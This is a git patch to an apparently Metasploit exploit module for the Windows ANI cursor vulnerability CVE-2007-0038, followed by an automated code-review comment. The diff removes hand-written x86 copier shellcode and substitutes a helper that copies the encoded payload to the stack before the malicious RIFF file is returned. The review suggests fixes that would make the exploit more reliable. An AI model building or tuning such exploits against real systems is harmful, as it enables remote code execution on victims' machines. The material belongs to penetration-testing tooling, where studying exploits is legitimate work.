From e2029b9d9c2a62018791180b667b0c89220e69d7 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Mon, 2 Apr 2007 05:54:44 +0000
Subject: [PATCH] Merged in copy_to_stack feature from HTTP exploit
git-svn-id: file:///home/svn/framework3/trunk@4614 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/email/ani_loadimage_chunksize.rb | 27 +++++++++----------
 1 file changed, 12 insertions(+), 15 deletions(-)
diff --git a/modules/exploits/windows/email/ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ani_loadimage_chunksize.rb
index 8b3f44836b..e0aeeae70e 100644
--- a/modules/exploits/windows/email/ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/email/ani_loadimage_chunksize.rb
@@ -280,22 +280,19 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
 end
 
-# Our ANI file is randomly placed into a read-only segment, the only reliable
-# solution is to copy our payload back to the stack and execute it there. This
-# is non-optimal and should be replaced soon.
-copier =
-"\xeb\x0f"+ # jmp _end
-"\x68\x00\x04\x00\x00"+ # push 1024
-"\x59"+ # pop ecx
-"\x5e"+ # pop esi
-"\x29\xcc"+ # sub esp, ecx
-"\x89\xe7"+ # mov edi, esp
-"\xf3\xa4"+ # rep movsb
-"\xff\xe4"+ # jmp esp
-"\xe8\xec\xff\xff\xff" # call _start
-
 # Place the RIFF chunk in front and off we go
-ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
+ret = "RIFF" + [riff.length].pack('V') + riff
+
+# We copy the encoded payload to the stack because sometimes the RIFF
+# image is mapped in read-only pages. This would prevent in-place
+# decoders from working, and we can't have that.
+ret << Rex::Arch::X86.copy_to_stack(payload.encoded.length)
+
+# Place the real payload right after it.
+ret << payload.encoded
+
+ret
+
 end
 
 # Generates a riff chunk with the first bytes of the data being a relative
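Review bot: `payload.encoded` is evaluated twice in the added lines — once for the byte count handed to `Rex::Arch::X86.copy_to_stack` and once when the bytes are appended — so the stub's copy length and the blob it copies only agree if that accessor is memoized across calls; capture it once so the two cannot drift: `encoded = payload.encoded`, `ret << Rex::Arch::X86.copy_to_stack(encoded.length)`, `ret << encoded`. A second point worth a comment: the removed inline copier always moved a fixed 1024 bytes below esp, whereas the helper now receives the full encoded payload length; if it reserves that much with a `sub esp` like the old stub did, a payload larger than roughly one page can write below the Windows stack guard page and fault instead of growing the stack, so the module's payload Space should stay well under 4 KiB or that assumption should be stated next to the call. The enclosing method begins before this hunk; only its tail and closing `end` are visible here.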